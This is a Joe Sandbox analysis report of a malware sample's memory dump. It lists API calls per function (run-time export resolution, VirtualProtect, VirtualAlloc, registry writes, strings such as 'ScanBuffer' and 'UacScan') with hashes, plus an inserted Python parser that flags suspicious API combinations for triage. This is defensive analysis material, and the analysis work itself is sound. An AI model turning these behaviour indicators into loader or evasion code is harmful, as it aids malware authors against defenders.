                                                                                                                            • GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02997B20: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B61
                                                                                                                              • Part of subcall function 02997B20: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997B67
                                                                                                                              • Part of subcall function 02997B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2543409266-0
                                                                                                                            • Opcode ID: 5032c13f1f8ced744851c6c8239caad011e22ae425c05a46b93d2564ba899086
                                                                                                                            • Instruction ID: d522d13a16d828f4eeb2ad9f3562c38c6b446e122028e8ef05c12f89d319c45b
                                                                                                                            • Opcode Fuzzy Hash: 5032c13f1f8ced744851c6c8239caad011e22ae425c05a46b93d2564ba899086
                                                                                                                            • Instruction Fuzzy Hash: 4A01D6B0604344AFEF00FBA8ED51A6EB7F9EFC4700F542464A519AB780DA34D900CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%
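The function listings above (the GetModuleHandleA/GetProcAddress/VirtualProtect block with its "irtualProtect$kernel32" strings, the two-Sleep block, the RegOpenKeyA/RegSetValueExA block and the LoadLibraryW/GetModuleHandleW/GetProcAddress block whose callee reaches VirtualProtect) all use the same bullet format, which makes a report of this size easy to post-process. The Python below is an added example and not part of the Joe Sandbox report or its tooling: it parses that format into per-function records and flags the API combinations an analyst would triage first (run-time export resolution, page-protection changes, registry writes, Sleep loops and API-name fragments). SAMPLE is a constructed excerpt of those four blocks; the flag names and the small KNOWN_APIS list are the example's own assumptions.

```python
"""Added example: parse Joe Sandbox per-function 'APIs' listings and flag API combinations
worth triaging. Not the report's or Joe Sandbox's own code; SAMPLE is a constructed excerpt
of four blocks from this report, and flag names and KNOWN_APIS are assumptions."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# API call bullet, e.g. "• VirtualProtect.KERNEL32(?,?,kernel32), ref: 02997B81";
# indented "Part of subcall function XXXX:" bullets carry the callee's address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID):\s*(?P<val>.*)$")
# Used only to recognise API-name fragments such as "irtualProtect" (assumed, deliberately short).
KNOWN_APIS = {"VirtualProtect", "VirtualAlloc", "GetProcAddress", "LoadLibraryW", "WriteProcessMemory"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                          # call-site address in the memory dump
    subcall_of: Optional[str] = None  # set when the call happens inside a callee

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)

    def names(self, direct_only: bool = False) -> set[str]:
        return {a.name for a in self.apis if not (direct_only and a.subcall_of)}

    def strings(self) -> list[str]:
        return [s for s in self.fields.get("String ID", "").split("$") if s]  # "$"-joined

def parse_report(text: str) -> list[FunctionRecord]:
    """Start a new record at every 'APIs' heading; collect its calls and metadata bullets."""
    records: list[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
        elif current is not None:
            if (m := API_LINE.match(line)):
                args = [a for a in m["args"].split(",") if a]
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
            elif (m := FIELD_LINE.match(line)):
                current.fields[m["key"]] = m["val"].strip()
    return records

def api_name_fragments(strings: list[str]) -> list[str]:
    """Strings that are a proper suffix (4+ chars) of a known API name, e.g. 'irtualProtect'."""
    return [s for s in strings if len(s) >= 4 and any(a != s and a.endswith(s) for a in KNOWN_APIS)]

def flag_record(rec: FunctionRecord) -> list[str]:
    """Fixed-order heuristic flags; they are triage hints, not verdicts."""
    direct, any_depth, flags = rec.names(direct_only=True), rec.names(), []
    if "GetProcAddress" in direct and direct & {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}:
        flags.append("dynamic_api_resolution")      # export resolved by name at run time
    if "VirtualProtect" in any_depth:
        flags.append("memory_protection_change")    # counted even when reached via a callee
    if direct & {"RegSetValueExA", "RegSetValueExW"}:
        flags.append("registry_write")
    if sum(a.name == "Sleep" for a in rec.apis) >= 2:
        flags.append("sleep_delay_loop")
    if frags := api_name_fragments(rec.strings()):
        flags.append("api_name_fragment:" + ",".join(frags))
    return flags

def triage(text: str) -> list[tuple[str, list[str]]]:
    """(API ID, flags) for each function block that earns at least one flag."""
    return [(r.fields.get("API ID", "?"), f) for r in parse_report(text) if (f := flag_record(r))]

SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B61
• GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997B67
• VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B81
• API ID: AddressHandleModuleProcProtectVirtual
• String ID: irtualProtect$kernel32
APIs
• Sleep.KERNEL32(00000000,?), ref: 02981B17
• Sleep.KERNEL32(0000000A,00000000,?), ref: 02981B31
• API ID: Sleep
• String ID:
APIs
• RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
• RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
• RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
• API ID: CloseOpenValue
APIs
• LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
• GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
• GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
  • Part of subcall function 02997B20: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32), ref: 02997B81
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
"""

if __name__ == "__main__":
    for api_id, flags in triage(SAMPLE):
        print(f"{api_id:55} {' '.join(flags)}")
```

The "Part of subcall function" bullets matter: the LoadLibraryW block never calls VirtualProtect itself, but its callee at 02997B20 does, so the flag is raised on the caller as well; an analyst filtering only on direct calls would miss that the import-resolution helper and the protection change belong to one code path. The fragment check is the weakest heuristic (a string such as "irtualProtect" may simply be a split constant), which is why it is reported as a hint rather than a verdict.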

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: 31aff32c1c66dcba52fa870f4424ca3497933e947d37c908a429f3d59bddaaf6
                                                                                                                            • Instruction ID: 4846936a2a11a3788b3f94ffb60f243fc812ae1c56b15240a4e1146224213169
                                                                                                                            • Opcode Fuzzy Hash: 31aff32c1c66dcba52fa870f4424ca3497933e947d37c908a429f3d59bddaaf6
                                                                                                                            • Instruction Fuzzy Hash: 4AF0F620704110D6CB147B38C8E4ABD2F9E6F82310B1C1837F8C65B252DB34CC06C762
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 02984D1F
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 02984D31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 986138563-0
                                                                                                                            • Opcode ID: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                            • Instruction ID: dc9506824ef5629fa2d71d30ebd8bb96d09b9b013559382f2999fb03bbcca42d
                                                                                                                            • Opcode Fuzzy Hash: 9cc863aca943af32668bddaa73da5bb5f203b93e717713a200e04cd1a03a22e4
                                                                                                                            • Instruction Fuzzy Hash: C0E012B85052025EEB143F218C40B7B376EAFC1765F5C549DA904DA150DB34C442AE35
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 02997396
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeString
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                            • Opcode ID: c3f009f88b3be62895cd8fd738d904ffb94c8b3c41cf63d1a7429120618d1a33
                                                                                                                            • Instruction ID: f21c229fb25e98619fca4385828499efe379e179e86f797c6d40adf48ecfeb08
                                                                                                                            • Opcode Fuzzy Hash: c3f009f88b3be62895cd8fd738d904ffb94c8b3c41cf63d1a7429120618d1a33
                                                                                                                            • Instruction Fuzzy Hash: E3B1C0B4A11609DFDB14CF98E880A9DFBF6FF89324F148569E805AB364DB31A845CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 0298E73D
                                                                                                                              • Part of subcall function 0298E320: VariantClear.OLEAUT32(?), ref: 0298E32F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 274517740-0
                                                                                                                            • Opcode ID: 0fc9391c0d7d727fde264833debb0dc8ad54432c1a26168d54c7298a77c03423
                                                                                                                            • Instruction ID: f375cf8ca0fad4129017f53c13cb87bb555086000b6ab63690b564accf9aab21
                                                                                                                            • Opcode Fuzzy Hash: 0fc9391c0d7d727fde264833debb0dc8ad54432c1a26168d54c7298a77c03423
                                                                                                                            • Instruction Fuzzy Hash: 2E11827470461087DB20FB29C8E496627EEAFC5750B1C5866FACA8F255DB31CC41CAA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1927566239-0
                                                                                                                            • Opcode ID: 8f411ddbb4794aa240ca5a28d4dfcdc1a1bdbabd5fad1a1837957da3b7c56d53
                                                                                                                            • Instruction ID: d22a7f0f7a56a476aca59443d1eca805fdde72821b2942e5aba622e0fac2ba9a
                                                                                                                            • Opcode Fuzzy Hash: 8f411ddbb4794aa240ca5a28d4dfcdc1a1bdbabd5fad1a1837957da3b7c56d53
                                                                                                                            • Instruction Fuzzy Hash: 19314D75A04208AFEB10EEA8C894AAA77FCEB4C314F480566F94DD7280D334E950CB61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,02996D75,?,?,?,00000000), ref: 02996D55
                                                                                                                              • Part of subcall function 02984C24: SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromProgString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4225568880-0
                                                                                                                            • Opcode ID: 4945b4e7057864ec9ed0f8f71c031b64a7badc18ad7b7a8c0b33e86c67615aaa
                                                                                                                            • Instruction ID: feae7b495436daaf4c827afa82cad872815ca62ac4271f5233b3c6391efdc0cc
                                                                                                                            • Opcode Fuzzy Hash: 4945b4e7057864ec9ed0f8f71c031b64a7badc18ad7b7a8c0b33e86c67615aaa
                                                                                                                            • Instruction Fuzzy Hash: B4E09B716046047FEB05FB7ADC51D9977FDDFC9710B620471E800D3641E9756E008965
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 0298584A
                                                                                                                              • Part of subcall function 02985A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985AAC
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985ACA
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AE8
                                                                                                                              • Part of subcall function 02985A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985B06
                                                                                                                              • Part of subcall function 02985A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B4F
                                                                                                                              • Part of subcall function 02985A90: RegQueryValueExA.ADVAPI32(?,02985CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B95,?,80000001), ref: 02985B6D
                                                                                                                              • Part of subcall function 02985A90: RegCloseKey.ADVAPI32(?,02985B9C,00000000,?,?,00000000,02985B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2796650324-0
                                                                                                                            • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                            • Instruction ID: 765500925699401f60f236247a7108689fd286298b9b45876ee4e8585ba4ff1b
                                                                                                                            • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                                                            • Instruction Fuzzy Hash: CEE06DB1A002148BCB10EE58C8C4A5633D8AB08754F4A0961EC68CF24AD370D9188BD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02987DB0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3934441357-0
                                                                                                                            • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                            • Instruction ID: bd2a84ff0d0895294c0e13a263d5c609859c5ba1bd10cca2141edc5fd63946ac
                                                                                                                            • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                            • Instruction Fuzzy Hash: A5D05B763091507AD220A55E5C44EF75BDCCFC9771F14063DB568C7180D7208C018671
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                            • Instruction ID: ddde7d95716119e10d36f2f313d89a52bfa02dba9424f7100ec20ab363cf4b5c
                                                                                                                            • Opcode Fuzzy Hash: f576f8495b3edd4a8e24de7a91902ce1e57f9f8a29b3fb9936075822a1a21783
                                                                                                                            • Instruction Fuzzy Hash: 1CC08CA6202300069A60B1FC0CC409E428C098423C33C1B3DB028DE2E2D32288122870
                                                                                                                            Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNEL32(00000000,?,029A1133,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,ScanString), ref: 02987E47
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction ID: c4e8f990124edb06549b0a971f4354e139e41ba8ad7778057e9f4acbf5102f4b
• Opcode Fuzzy Hash: 198306c4462bc0bb9e5a1539ed44b571103b139370df0eb3b7b09f60ce76aac9
• Instruction Fuzzy Hash: 89C08CA66023090E5E60B2FC1CC02E9428E099463833C2B21E028EE1E2D31298222820
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
• Instruction ID: 8823e9c79b5300a1f64ef39fcad795bfba069dc5ac8521781c7aad292224faa5
• Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
• Instruction Fuzzy Hash: D1C080B160023147FF31B65C9CC079562CCEF453E5F1C00A1D618D7240E760DC0087B5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(0299D42C), ref: 02984C32
• SysReAllocStringLen.OLEAUT32(029A9E68,0299D42C,00000016), ref: 02984C7A
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: String$AllocFree
• String ID:
• API String ID: 344208780-0
• Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction ID: 6990930d8e1ef917314f491906c8cdd6d6bf6d8713506dcb75d334462dffdc0c
• Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
• Instruction Fuzzy Hash: 13D080745001435EDF3C771549049B661EEDDD030B74CFE5D99124B140F761C401CA36
Uniqueness

Uniqueness Score: -1.00%

APIs
• timeSetEvent.WINMM(00002710,00000000,029A9B48,00000000,00000001), ref: 029A9B64
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: Eventtime
• String ID:
• API String ID: 2982266575-0
• Opcode ID: 1ecf4a4c62aea22e303b25804970f665201f61ec254881f5bd691aff6286328f
• Instruction ID: a49edc407957baddb002a0a8a6490fd52ce9cb12a6f74c717127be548e773d32
• Opcode Fuzzy Hash: 1ecf4a4c62aea22e303b25804970f665201f61ec254881f5bd691aff6286328f
• Instruction Fuzzy Hash: D8C092F07E63007EFA106AB52CD2F73558DEB84B01F50181AB600EE2C1E9E2582016B0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SysAllocStringLen.OLEAUT32(00000000,?), ref: 02984C03
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AllocString
• String ID:
• API String ID: 2525500382-0
• Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
• Instruction ID: 6f536117f8d94398c8b8491ed5f0d50a9c9b4ad9a5b4e8a15871426e1fa59921
• Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
• Instruction Fuzzy Hash: 25B0123860820358FB5433220E007B6008C1FD0295F8C24519F18D80C0FB01C002883B
Uniqueness

Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(00000000), ref: 02984C1B
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
• Instruction ID: 23903ec5c050cbdf1b1f0e006b014c5596c95867cc55300f45d3b4637762e0d0
• Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
• Instruction Fuzzy Hash: 6EA022BC0003230ACF0B332E000022E203FBFC03003CCC8E803000B000AF3A8000AE38
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02981A03,?,02982000), ref: 029815E2
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f1c963e95d0fdaf98c9baaf98bb5c2f04b08466af05229b288d18ba443dd421e
• Instruction ID: 9afaa233de7acd0f6debcb70989a8fba78e27c076727012c004cd381813930e8
• Opcode Fuzzy Hash: f1c963e95d0fdaf98c9baaf98bb5c2f04b08466af05229b288d18ba443dd421e
• Instruction Fuzzy Hash: BAF037F0B453008BDF05DF7999423156BD6E789745F548579D60DDB298E77288028B00
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02982000), ref: 029816A4
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
